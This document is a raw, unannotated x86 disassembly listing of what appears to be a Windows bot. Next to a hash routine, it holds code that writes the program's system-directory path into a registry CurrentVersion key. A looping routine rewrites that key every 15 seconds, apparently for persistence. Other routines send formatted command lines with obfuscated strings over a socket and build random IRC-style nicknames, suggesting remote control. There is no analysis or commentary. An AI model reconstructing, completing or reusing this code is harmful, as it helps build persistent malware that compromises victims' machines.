mov eax, [esp+170h+var_100]
shl ebx, 1Fh
or ebx, ecx
mov ecx, [esp+170h+var_FC]
shrd eax, ecx, 7
shr ecx, 7
xor esi, ebx
xor edi, ebp
xor esi, ecx
mov ecx, [esp+170h+var_160]
xor edi, eax
mov eax, [esp+170h+arg_0]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_C8]
adc edx, [esp+170h+var_C4]
add ecx, [esp+170h+var_E0]
adc edx, [esp+170h+var_DC]
mov [eax+0C8h], ecx
mov [eax+0CCh], edx
mov eax, edx
mov [esp+170h+var_E0], ecx
mov [esp+170h+var_DC], eax
mov [esp+170h+var_10], ecx
jmp short loc_4170EF
; ---------------------------------------------------------------------------
loc_4170DA: ; CODE XREF: sub_414BC0+2429j
mov edx, [esp+170h+var_E0]
mov eax, [esp+170h+var_DC]
mov [esp+170h+var_10], edx
loc_4170EF: ; CODE XREF: sub_414BC0+2518j
mov ecx, [esp+170h+var_12C]
mov ebx, ecx
mov [esp+170h+var_C], eax
mov eax, [esp+170h+var_130]
xor esi, esi
mov edx, ecx
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
xor ebx, ebx
shr edx, 9
or edx, edi
mov ebp, eax
shrd ebp, ecx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_12C]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
xor edi, edi
or edi, ebx
xor edx, edi
shr ebp, 0Eh
mov ecx, eax
shl ecx, 12h
or ecx, ebp
mov ebp, [esp+170h+var_128]
xor esi, ecx
mov ecx, [esp+170h+var_12C]
and ebp, eax
mov edi, eax
mov eax, [esp+170h+var_124]
and eax, ecx
mov ebx, ecx
mov ecx, [esp+170h+var_154]
not ebx
and ebx, [esp+170h+var_11C]
not edi
and edi, [esp+170h+var_120]
xor ebx, eax
mov eax, [esp+170h+var_15C]
xor edi, ebp
add edx, edi
adc esi, ebx
add edx, ds:dword_41FA70[eax*8]
adc esi, ds:dword_41FA74[eax*8]
add edx, [esp+170h+var_10]
mov eax, [esp+170h+var_158]
adc esi, [esp+170h+var_C]
add eax, edx
adc ecx, esi
add [esp+170h+var_138], eax
mov [esp+170h+var_154], ecx
mov [esp+170h+var_158], eax
adc [esp+170h+var_134], ecx
mov ecx, [esp+170h+var_150]
mov eax, [esp+170h+var_14C]
mov edx, ecx
mov ebx, eax
shrd edx, ebx, 1Ch
mov esi, ecx
mov ebp, eax
shld ebp, ecx, 1Eh
xor edi, edi
or edi, edx
shr ebx, 1Ch
shl esi, 4
or esi, ebx
mov edx, eax
shr edx, 2
shl ecx, 1Eh
xor ebx, ebx
or edx, ecx
or ebx, ebp
xor edi, edx
xor esi, ebx
mov ebx, [esp+170h+var_150]
mov ebp, eax
shld ebp, ebx, 19h
shl ebx, 19h
xor edx, edx
or edx, ebp
mov ecx, eax
shr ecx, 7
or ecx, ebx
xor edi, ecx
mov ecx, [esp+170h+var_150]
xor esi, edx
mov edx, [esp+170h+var_140]
mov ebx, ecx
and ecx, edx
xor ebx, edx
and ebx, [esp+170h+var_148]
mov ebp, eax
xor ebp, [esp+170h+var_13C]
mov edx, ecx
and ebp, [esp+170h+var_144]
mov ecx, [esp+170h+var_13C]
and eax, ecx
xor ebx, edx
xor ebp, eax
add edi, ebx
adc esi, ebp
add [esp+170h+var_158], edi
mov edi, [esp+170h+var_15C]
adc [esp+170h+var_154], esi
add edi, 10h
cmp edi, 50h
mov [esp+170h+var_15C], edi
jb loc_414D50
mov eax, [esp+170h+var_4]
mov edx, [esp+170h+var_158]
add [eax], edx
mov edx, [esp+170h+var_154]
pop edi
adc [eax+4], edx
mov eax, [esp+16Ch+arg_0]
mov edx, [esp+16Ch+var_150]
add [eax+18h], edx
mov edx, [esp+16Ch+var_14C]
pop esi
adc [eax+1Ch], edx
mov edx, [esp+168h+var_148]
add [eax+20h], edx
mov edx, [esp+168h+var_144]
pop ebp
adc [eax+24h], edx
mov edx, [esp+164h+var_140]
add [eax+28h], edx
mov edx, [esp+164h+var_134]
pop ebx
adc [eax+2Ch], ecx
mov ecx, [esp+160h+var_138]
add [eax+30h], ecx
mov ecx, [esp+160h+var_130]
adc [eax+34h], edx
add [eax+38h], ecx
mov edx, [esp+160h+var_12C]
mov ecx, [esp+160h+var_128]
adc [eax+3Ch], edx
add [eax+40h], ecx
mov edx, [esp+160h+var_124]
mov ecx, [esp+160h+var_120]
adc [eax+44h], edx
add [eax+48h], ecx
mov edx, [esp+160h+var_11C]
adc [eax+4Ch], edx
add esp, 160h
retn
sub_414BC0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4172D0 proc near ; CODE XREF: .text:00417552p
; sub_41BDFF+CAp
var_4 = dword ptr -4
arg_0 = dword ptr 4
push ecx
mov ecx, [ebx]
push ebp
and ecx, 7Fh
push esi
lea esi, [ecx+7]
shr esi, 3
push edi
mov [esp+10h+var_4], ecx
jz short loc_417335
lea edx, [ebx+esi*8+50h]
loc_4172E9: ; CODE XREF: sub_4172D0+5Fj
mov eax, [edx-8]
mov ecx, [edx-4]
sub edx, 8
mov edi, eax
sub esi, 1
ror edi, 8
and edi, 0FF00FF00h
rol eax, 8
and eax, 0FF00FFh
or edi, eax
mov ebp, ecx
xor eax, eax
ror ebp, 8
and ebp, 0FF00FF00h
rol ecx, 8
and ecx, 0FF00FFh
or ebp, ecx
xor ecx, ecx
or eax, ebp
or edi, ecx
test esi, esi
mov [edx], eax
mov [edx+4], edi
jnz short loc_4172E9
mov ecx, [esp+10h+var_4]
loc_417335: ; CODE XREF: sub_4172D0+13j
mov eax, ecx
and eax, 7
add eax, eax
add eax, eax
mov esi, dword_425BA8[eax+eax]
mov edi, dword_425BAC[eax+eax]
add eax, eax
mov edx, ecx
shr edx, 3
and esi, [ebx+edx*8+50h]
and edi, [ebx+edx*8+54h]
or esi, dword_425BE8[eax]
or edi, dword_425BEC[eax]
cmp ecx, 6Fh
mov [ebx+edx*8+50h], esi
mov [ebx+edx*8+54h], edi
jbe short loc_41739A
cmp ecx, 78h
jnb short loc_41738D
mov dword ptr [ebx+0C8h], 0
mov dword ptr [ebx+0CCh], 0
loc_41738D: ; CODE XREF: sub_4172D0+A7j
push ebx
call sub_414BC0
add esp, 4
xor edx, edx
jmp short loc_4173A2
; ---------------------------------------------------------------------------
loc_41739A: ; CODE XREF: sub_4172D0+A2j
add edx, 1
cmp edx, 0Eh
jnb short loc_4173C8
loc_4173A2: ; CODE XREF: sub_4172D0+C8j
mov ecx, 0Dh
sub ecx, edx
add ecx, ecx
add ecx, ecx
lea esi, [ebx+edx*8+50h]
add ecx, ecx
shr ecx, 2
lea edi, [esi+8]
mov dword ptr [esi], 0
mov dword ptr [esi+4], 0
rep movsd
loc_4173C8: ; CODE XREF: sub_4172D0+D0j
mov edx, [ebx+8]
mov esi, [ebx+0Ch]
mov ecx, [ebx+4]
mov eax, [ebx]
shld esi, edx, 3
add edx, edx
mov edi, ecx
shld ecx, eax, 3
add edx, edx
add eax, eax
add edx, edx
add eax, eax
shr edi, 1Dh
xor ebp, ebp
or edx, edi
add eax, eax
or esi, ebp
push ebx
mov [ebx+0C0h], edx
mov [ebx+0C4h], esi
mov [ebx+0C8h], eax
mov [ebx+0CCh], ecx
call sub_414BC0
add esp, 4
xor esi, esi
loc_417415: ; CODE XREF: sub_4172D0+171j
mov ecx, esi
not ecx
and ecx, 7
mov edx, esi
shr edx, 3
mov eax, [ebx+edx*8+10h]
mov edx, [ebx+edx*8+14h]
add ecx, ecx
add ecx, ecx
add ecx, ecx
call sub_411C90
mov ecx, [esp+10h+arg_0]
mov [esi+ecx], al
add esi, 1
cmp esi, 40h
jb short loc_417415
pop edi
pop esi
pop ebp
pop ecx
retn
sub_4172D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_417450 proc near ; CODE XREF: sub_41BDFF+A3p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
sub esp, 0Ch
push ebx
mov ebx, [esp+10h+arg_4]
mov eax, [ebx]
push ebp
mov ebp, [esp+14h+arg_0]
push esi
push edi
and eax, 7Fh
mov edi, 80h
sub edi, eax
mov esi, ecx
xor ecx, ecx
add [ebx], ebp
adc [ebx+4], ecx
mov edx, [ebx+4]
cmp edx, ecx
ja short loc_41748B
jb short loc_417483
mov ecx, [ebx]
cmp ecx, ebp
jnb short loc_41748B
loc_417483: ; CODE XREF: sub_417450+2Bj
add dword ptr [ebx+8], 1
adc dword ptr [ebx+0Ch], 0
loc_41748B: ; CODE XREF: sub_417450+29j
; sub_417450+31j
cmp ebp, edi
jb loc_41752F
loc_417493: ; CODE XREF: sub_417450+D9j
push edi
lea edx, [ebx+eax+50h]
push esi
push edx
call sub_407FA0
add esi, edi
add esp, 0Ch
sub ebp, edi
mov [esp+1Ch+var_4], esi
mov [esp+1Ch+arg_0], ebp
mov edi, 80h
mov [esp+1Ch+var_8], 0
mov esi, 10h
lea edx, [ebx+0D0h]
loc_4174C6: ; CODE XREF: sub_417450+BCj
mov eax, [edx-8]
mov ecx, [edx-4]
sub edx, 8
mov ebx, eax
sub esi, 1
ror ebx, 8
and ebx, 0FF00FF00h
rol eax, 8
and eax, 0FF00FFh
or ebx, eax
mov ebp, ecx
xor eax, eax
ror ebp, 8
and ebp, 0FF00FF00h
rol ecx, 8
and ecx, 0FF00FFh
or ebp, ecx
xor ecx, ecx
or eax, ebp
or ebx, ecx
test esi, esi
mov [edx], eax
mov [edx+4], ebx
jnz short loc_4174C6
mov ebx, [esp+1Ch+arg_4]
push ebx
call sub_414BC0
mov ebp, [esp+20h+arg_0]
mov eax, [esp+20h+var_8]
mov esi, [esp+20h+var_4]
add esp, 4
cmp ebp, edi
jnb loc_417493
loc_41752F: ; CODE XREF: sub_417450+3Dj
push ebp
lea edx, [eax+ebx+50h]
push esi
push edx
call sub_407FA0
add esp, 0Ch
pop edi
pop esi
pop ebp
pop ebx
add esp, 0Ch
retn
sub_417450 endp
; ---------------------------------------------------------------------------
align 10h
push ecx
push eax
call sub_4172D0
add esp, 4
pop ecx
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41755C proc near ; CODE XREF: sub_41755C+D5p
; sub_41AFF3+66Dp
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_C = word ptr 14h
arg_14 = dword ptr 1Ch
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
arg_28 = byte ptr 30h
arg_2B = byte ptr 33h
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_28], 0
push ebx
push esi
push edi
jz short loc_417575
mov ecx, [ebp+arg_4]
shr ecx, 18h
or cl, 1
jmp short loc_41757B
; ---------------------------------------------------------------------------
loc_417575: ; CODE XREF: sub_41755C+Cj
mov cl, byte ptr [ebp+arg_4+3]
and cl, 0FEh
loc_41757B: ; CODE XREF: sub_41755C+17j
movzx eax, word ptr [ebp+arg_24]
mov ebx, [ebp+arg_20]
lea edx, [ebx+18h]
cmp edx, eax
ja short loc_417598
lea edx, [ebx+18h]
mov [ebp+arg_14], ebx
or cl, 2
mov [ebp+arg_2B], 0
jmp short loc_4175A9
; ---------------------------------------------------------------------------
loc_417598: ; CODE XREF: sub_41755C+2Bj
mov dx, word ptr [ebp+arg_24]
add eax, 0FFFFFFE8h
mov [ebp+arg_14], eax
and cl, 0FDh
mov [ebp+arg_2B], 1
loc_4175A9: ; CODE XREF: sub_41755C+3Aj
movzx eax, dx
push eax
mov byte ptr [ebp+arg_4+3], cl
mov [ebp+arg_C], dx
mov [ebp+var_4], eax
call sub_403AAC
test eax, eax
pop ecx
mov [ebp+arg_20], eax
jz loc_417648
push 6
pop ecx
mov edi, eax
lea esi, [ebp+arg_4]
rep movsd
mov edi, [ebp+arg_14]
mov esi, [ebp+arg_1C]
push edi
add eax, 18h
push esi
push eax
call sub_407FA0
add esp, 0Ch
push 0
lea eax, [ebp+var_8]
push eax
push [ebp+var_4]
push [ebp+arg_20]
push [ebp+arg_0]
call ds:off_41D088
test eax, eax
jz short loc_41763F
mov eax, [ebp+var_4]
cmp [ebp+var_8], eax
jnz short loc_41763F
push [ebp+arg_20]
call sub_4039CF
cmp [ebp+arg_2B], 0
pop ecx
jz short loc_41763B
push 0
push [ebp+arg_24]
sub ebx, edi
push ebx
add edi, esi
push edi
sub esp, 18h
push 6
pop ecx
mov edi, esp
push [ebp+arg_0]
lea esi, [ebp+arg_4]
rep movsd
call sub_41755C
add esp, 2Ch
jmp short loc_41764A
; ---------------------------------------------------------------------------
loc_41763B: ; CODE XREF: sub_41755C+B8j
mov al, 1
jmp short loc_41764A
; ---------------------------------------------------------------------------
loc_41763F: ; CODE XREF: sub_41755C+A1j
; sub_41755C+A9j
push [ebp+arg_20]
call sub_4039CF
pop ecx
loc_417648: ; CODE XREF: sub_41755C+66j
xor al, al
loc_41764A: ; CODE XREF: sub_41755C+DDj
; sub_41755C+E1j
pop edi
pop esi
pop ebx
leave
retn
sub_41755C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41764F proc near ; CODE XREF: sub_417776+154p
; sub_417909+152p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ebx
xor ebx, ebx
push ebx
lea eax, [ebp+var_4]
push eax
push ebx
push 0F003Fh
push ebx
push ebx
push ebx
push [ebp+arg_0]
push 80000002h
call ds:off_41D004
test eax, eax
jz short loc_417684
push [ebp+var_4]
call ds:off_41D010
xor al, al
loc_417681: ; CODE XREF: sub_41764F+68j
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_417684: ; CODE XREF: sub_41764F+25j
mov eax, [ebp+arg_8]
push esi
lea esi, [eax+1]
loc_41768B: ; CODE XREF: sub_41764F+41j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_41768B
sub eax, esi
push eax
push [ebp+arg_8]
push 1
push ebx
push [ebp+arg_4]
push [ebp+var_4]
call ds:off_41D00C
test eax, eax
pop esi
jz short loc_4176B9
loc_4176AC: ; CODE XREF: sub_41764F+6Cj
push [ebp+var_4]
call ds:off_41D010
mov al, bl
jmp short loc_417681
; ---------------------------------------------------------------------------
loc_4176B9: ; CODE XREF: sub_41764F+5Bj
mov bl, 1
jmp short loc_4176AC
sub_41764F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4176BD proc near ; CODE XREF: sub_417776+113p
; sub_417909+100p ...
var_4 = dword ptr -4
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
lea eax, [ebp+var_4]
push eax
push 1
push 0
push [ebp+arg_4]
push 80000002h
call ds:off_41D02C
test eax, eax
jnz short loc_417705
lea eax, [ebp+arg_10]
push eax
push [ebp+arg_C]
lea eax, [ebp+arg_0]
push eax
push 0
push [ebp+arg_8]
push [ebp+var_4]
call ds:off_41D008
test eax, eax
jnz short loc_417705
push [ebp+var_4]
call ds:off_41D010
mov al, 1
leave
retn
; ---------------------------------------------------------------------------
loc_417705: ; CODE XREF: sub_4176BD+1Cj
; sub_4176BD+39j
push [ebp+var_4]
call ds:off_41D010
push [ebp+arg_10]
push 0
push [ebp+arg_C]
call sub_407F20
add esp, 0Ch
xor al, al
leave
retn
sub_4176BD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417722 proc near ; CODE XREF: sub_419CB0+134p
; sub_41A2D8+F2p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ebx
xor ebx, ebx
push ebx
lea eax, [ebp+var_4]
push eax
push ebx
push 0F003Fh
push ebx
push ebx
push ebx
push [ebp+arg_4]
push [ebp+arg_0]
call ds:off_41D004
test eax, eax
jz short loc_417755
push [ebp+var_4]
call ds:off_41D010
xor al, al
loc_417752: ; CODE XREF: sub_417722+4Ej
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_417755: ; CODE XREF: sub_417722+23j
push [ebp+arg_8]
push [ebp+var_4]
call ds:off_41D000
test eax, eax
jz short loc_417772
loc_417765: ; CODE XREF: sub_417722+52j
push [ebp+var_4]
call ds:off_41D010
mov al, bl
jmp short loc_417752
; ---------------------------------------------------------------------------
loc_417772: ; CODE XREF: sub_417722+41j
mov bl, 1
jmp short loc_417765
sub_417722 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=94h
sub_417776 proc near ; CODE XREF: sub_41C2E2:loc_41C607p
var_114 = dword ptr -114h
var_110 = dword ptr -110h
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_104 = byte ptr -104h
var_4 = dword ptr -4
push ebp
lea ebp, [esp-94h]
sub esp, 114h
mov eax, dword_423064
xor eax, ebp
mov [ebp+94h+var_4], eax
push ebx
push esi
push edi
mov edi, 100h
push edi
call sub_402A14
mov esi, eax
push edi
mov [ebp+94h+var_110], esi
call sub_402A14
push edi
mov [ebp+94h+var_108], eax
call sub_402A14
push edi
mov [ebp+94h+var_114], eax
call sub_402A14
push [ebp+94h+var_114]
mov [ebp+94h+var_10C], eax
call sub_402E11
push eax
xor ebx, ebx
push ebx
push [ebp+94h+var_114]
call sub_407F20
push [ebp+94h+var_10C]
call sub_402E11
push eax
push ebx
push [ebp+94h+var_10C]
call sub_407F20
push edi
lea eax, [ebp+94h+var_104]
push ebx
push eax
call sub_407F20
push esi
call sub_402E11
add esp, 40h
push eax
push ebx
push esi
call sub_407F20
push [ebp+94h+var_108]
call sub_402E11
push eax
push ebx
push [ebp+94h+var_108]
call sub_407F20
push esi
call sub_402E11
push eax
mov ebx, offset byte_426B01
call sub_419F0A
mov esi, [ebp+94h+var_108]
push esi
call sub_402E11
push eax
mov ebx, offset aVQdD ; "¢³²²²ï¤¹¤"
call sub_419F0A
mov ebx, [ebp+94h+var_114]
push ebx
call sub_402E11
add esp, 30h
dec eax
push eax
push ebx
call ds:dword_41D0F0 ; GetSystemDirectoryA
push esi
mov esi, [ebp+94h+var_10C]
push ebx
push offset dword_420198
push esi
call sub_402E11
pop ecx
dec eax
push eax
push esi
call sub_402EBA
mov eax, esi
add esp, 14h
lea ecx, [eax+1]
loc_41786E: ; CODE XREF: sub_417776+FDj
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41786E
sub eax, ecx
push edi
mov [eax+esi], dl
lea eax, [ebp+94h+var_104]
push eax
push [ebp+94h+var_110]
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 1
call sub_4176BD
add esp, 14h
test al, al
jz short loc_4178C1
lea eax, [ebp+94h+var_104]
mov ecx, esi
loc_41789A: ; CODE XREF: sub_417776+13Cj
mov dl, [ecx]
cmp dl, [eax]
jnz short loc_4178B8
test dl, dl
jz short loc_4178B4
mov dl, [ecx+1]
cmp dl, [eax+1]
jnz short loc_4178B8
inc ecx
inc ecx
inc eax
inc eax
test dl, dl
jnz short loc_41789A
loc_4178B4: ; CODE XREF: sub_417776+12Cj
xor eax, eax
jmp short loc_4178BD
; ---------------------------------------------------------------------------
loc_4178B8: ; CODE XREF: sub_417776+128j
; sub_417776+134j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_4178BD: ; CODE XREF: sub_417776+140j
test eax, eax
jz short loc_4178D2
loc_4178C1: ; CODE XREF: sub_417776+11Dj
push esi
push [ebp+94h+var_110]
push offset aSoftwareMicr_0 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
call sub_41764F
add esp, 0Ch
loc_4178D2: ; CODE XREF: sub_417776+149j
push [ebp+94h+var_110]
call sub_402F67
push [ebp+94h+var_108]
call sub_402F67
push ebx
call sub_402F67
push esi
call sub_402F67
mov ecx, [ebp+94h+var_4]
add esp, 10h
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402ADC
add ebp, 94h
leave
retn
sub_417776 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_417909 proc near ; DATA XREF: sub_41C2E2+336o
var_504 = byte ptr -504h
var_404 = byte ptr -404h
var_403 = byte ptr -403h
var_304 = byte ptr -304h
var_303 = byte ptr -303h
var_204 = byte ptr -204h
var_203 = byte ptr -203h
var_104 = byte ptr -104h
var_103 = byte ptr -103h
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 504h
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push ebx
push esi
push edi
mov esi, 0FFh
xor ebx, ebx
push esi
lea eax, [ebp+var_203]
push ebx
push eax
mov [ebp+var_204], bl
call sub_407F20
push esi
lea eax, [ebp+var_403]
push ebx
push eax
mov [ebp+var_404], bl
call sub_407F20
push esi
lea eax, [ebp+var_303]
push ebx
push eax
mov [ebp+var_304], bl
call sub_407F20
push esi
lea eax, [ebp+var_103]
push ebx
push eax
mov [ebp+var_104], bl
call sub_407F20
add esp, 30h
mov edi, 100h
loc_41797E: ; CODE XREF: sub_417909+1AEj
push edi
lea esi, [ebp+var_204]
mov ebx, offset byte_426B01
call sub_419F0A
push edi
lea esi, [ebp+var_404]
mov ebx, offset aVQdD ; "¢³²²²ï¤¹¤"
call sub_419F0A
pop ecx
pop ecx
mov esi, 0FFh
push esi
lea eax, [ebp+var_304]
push eax
call ds:dword_41D0F0 ; GetSystemDirectoryA
lea eax, [ebp+var_404]
push eax
lea eax, [ebp+var_304]
push eax
push offset aSS_3 ; "%s\\%s"
lea eax, [ebp+var_104]
push esi
push eax
call sub_402EBA
lea eax, [ebp+var_104]
add esp, 14h
lea ecx, [eax+1]
loc_4179E1: ; CODE XREF: sub_417909+DDj
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4179E1
sub eax, ecx
xor ebx, ebx
mov [ebp+eax+var_104], bl
push edi
lea eax, [ebp+var_504]
push eax
lea eax, [ebp+var_204]
push eax
push offset aSoftwareMicr_1 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 1
call sub_4176BD
add esp, 14h
test al, al
jz short loc_417A48
lea ecx, [ebp+var_504]
lea eax, [ebp+var_104]
loc_417A21: ; CODE XREF: sub_417909+130j
mov dl, [eax]
cmp dl, [ecx]
jnz short loc_417A3F
cmp dl, bl
jz short loc_417A3B
mov dl, [eax+1]
cmp dl, [ecx+1]
jnz short loc_417A3F
inc eax
inc eax
inc ecx
inc ecx
cmp dl, bl
jnz short loc_417A21
loc_417A3B: ; CODE XREF: sub_417909+120j
xor eax, eax
jmp short loc_417A44
; ---------------------------------------------------------------------------
loc_417A3F: ; CODE XREF: sub_417909+11Cj
; sub_417909+128j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_417A44: ; CODE XREF: sub_417909+134j
cmp eax, ebx
jz short loc_417A63
loc_417A48: ; CODE XREF: sub_417909+10Aj
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_204]
push eax
push offset aSoftwareMicr_2 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
call sub_41764F
add esp, 0Ch
loc_417A63: ; CODE XREF: sub_417909+13Dj
push edi
lea eax, [ebp+var_304]
push ebx
push eax
call sub_407F20
push edi
lea eax, [ebp+var_104]
push ebx
push eax
call sub_407F20
push edi
lea eax, [ebp+var_504]
push ebx
push eax
call sub_407F20
push edi
lea eax, [ebp+var_204]
push ebx
push eax
call sub_407F20
push edi
lea eax, [ebp+var_404]
push ebx
push eax
call sub_407F20
add esp, 3Ch
push 3A98h
call ds:off_41D0F8
jmp loc_41797E
sub_417909 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417ABC proc near ; CODE XREF: sub_401C1D+C9p
; sub_401C1D+E4p ...
var_204 = byte ptr -204h
var_203 = byte ptr -203h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
sub esp, 204h
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push esi
mov esi, 1FFh
push esi
lea eax, [ebp+var_203]
push 0
push eax
mov [ebp+var_204], 0
call sub_407F20
lea eax, [ebp+arg_4]
push eax
push [ebp+arg_0]
lea eax, [ebp+var_204]
push esi
push eax
call sub_403802
lea eax, [ebp+var_204]
add esp, 1Ch
lea esi, [eax+1]
loc_417B0B: ; CODE XREF: sub_417ABC+54j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_417B0B
sub eax, esi
mov [ebp+eax+var_204], cl
lea eax, [ebp+var_204]
lea esi, [eax+1]
loc_417B24: ; CODE XREF: sub_417ABC+6Dj
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_417B24
push 0
sub eax, esi
push eax
lea eax, [ebp+var_204]
push eax
push dword ptr [edi]
call ds:dword_41D228 ; send
mov ecx, [ebp+var_4]
test eax, eax
setnz al
xor ecx, ebp
pop esi
call sub_402ADC
leave
retn
sub_417ABC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417B51 proc near ; CODE XREF: sub_40177B+268p
; sub_4019F3+21Ap ...
var_40C = dword ptr -40Ch
var_408 = dword ptr -408h
var_404 = byte ptr -404h
var_403 = byte ptr -403h
var_204 = byte ptr -204h
var_203 = byte ptr -203h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
push ebp
mov ebp, esp
sub esp, 40Ch
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ebx
push edi
mov [ebp+var_408], eax
mov eax, [ebp+arg_8]
mov edi, 1FFh
xor ebx, ebx
push edi
mov [ebp+var_40C], eax
lea eax, [ebp+var_203]
push ebx
push eax
mov [ebp+var_204], bl
call sub_407F20
push edi
lea eax, [ebp+var_403]
push ebx
push eax
mov [ebp+var_404], bl
call sub_407F20
add esp, 18h
cmp [ebp+arg_4], 1
jz loc_417C6D
push esi
push 0Dh
call sub_402A14
mov esi, eax
lea eax, [ebp+arg_10]
push eax
push [ebp+arg_C]
lea eax, [ebp+var_404]
push edi
push eax
call sub_403802
lea eax, [ebp+var_404]
add esp, 14h
lea ecx, [eax+1]
loc_417BDE: ; CODE XREF: sub_417B51+92j
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_417BDE
sub eax, ecx
push esi
mov [ebp+eax+var_404], bl
call sub_402E11
push eax
mov ebx, offset aSuicmtj ; "‘“ˆ—Œ’†"
call sub_419F0A
lea eax, [ebp+var_404]
push eax
push [ebp+var_40C]
lea eax, [ebp+var_204]
push esi
push offset aSSS_1 ; "%s %s %s\r\n"
push edi
push eax
call sub_402EBA
lea eax, [ebp+var_204]
add esp, 20h
lea ecx, [eax+1]
loc_417C2B: ; CODE XREF: sub_417B51+DFj
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_417C2B
sub eax, ecx
push esi
mov [ebp+eax+var_204], dl
call sub_402F67
pop ecx
lea eax, [ebp+var_204]
lea ecx, [eax+1]
pop esi
loc_417C4C: ; CODE XREF: sub_417B51+100j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_417C4C
sub eax, ecx
push 0
push eax
lea eax, [ebp+var_204]
push eax
mov eax, [ebp+var_408]
push dword ptr [eax]
call ds:dword_41D228 ; send
loc_417C6D: ; CODE XREF: sub_417B51+5Dj
mov ecx, [ebp+var_4]
pop edi
xor ecx, ebp
pop ebx
call sub_402ADC
leave
retn
sub_417B51 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417C7B proc near ; CODE XREF: sub_41881F+39p
; sub_418884+279p
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = byte ptr -40h
var_3F = byte ptr -3Fh
var_3C = byte ptr -3Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 48h
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push esi
push edi
xor eax, eax
mov [ebp+var_40], 0
lea edi, [ebp+var_3F]
stosw
stosb
push 0Dh
pop ecx
mov esi, offset aQwertyuiopasdf ; "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPLKJ"...
lea edi, [ebp+var_3C]
rep movsd
lea eax, [ebp+var_48]
push eax
movsb
call ds:off_41D1E8
call ds:dword_41D104 ; GetTickCount
mov ecx, [ebp+var_44]
mov edx, [ebp+var_48]
add ecx, edx
cmp eax, ecx
jb short loc_417CC7
add ecx, eax
jmp short loc_417CC9
; ---------------------------------------------------------------------------
loc_417CC7: ; CODE XREF: sub_417C7B+46j
sub ecx, eax
loc_417CC9: ; CODE XREF: sub_417C7B+4Aj
push ecx
call sub_403722
pop ecx
push 8
pop ecx
xor eax, eax
mov edi, ebx
rep stosd
push offset asc_4203F0 ; "["
stosw
push 22h
push ebx
stosb
call sub_402EBA
mov eax, ebx
add esp, 0Ch
lea esi, [eax+1]
loc_417CF1: ; CODE XREF: sub_417C7B+7Bj
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_417CF1
xor edi, edi
sub eax, esi
push edi
mov [eax+ebx], cl
push 4
pop ecx
lea esi, [ebp+var_40]
call sub_41967F
pop ecx
mov eax, esi
push eax
push ebx
push offset aSS ; "%s%s|"
push 22h
push ebx
call sub_402EBA
mov eax, ebx
add esp, 14h
lea esi, [eax+1]
loc_417D25: ; CODE XREF: sub_417C7B+AFj
mov cl, [eax]
inc eax
test cl, cl
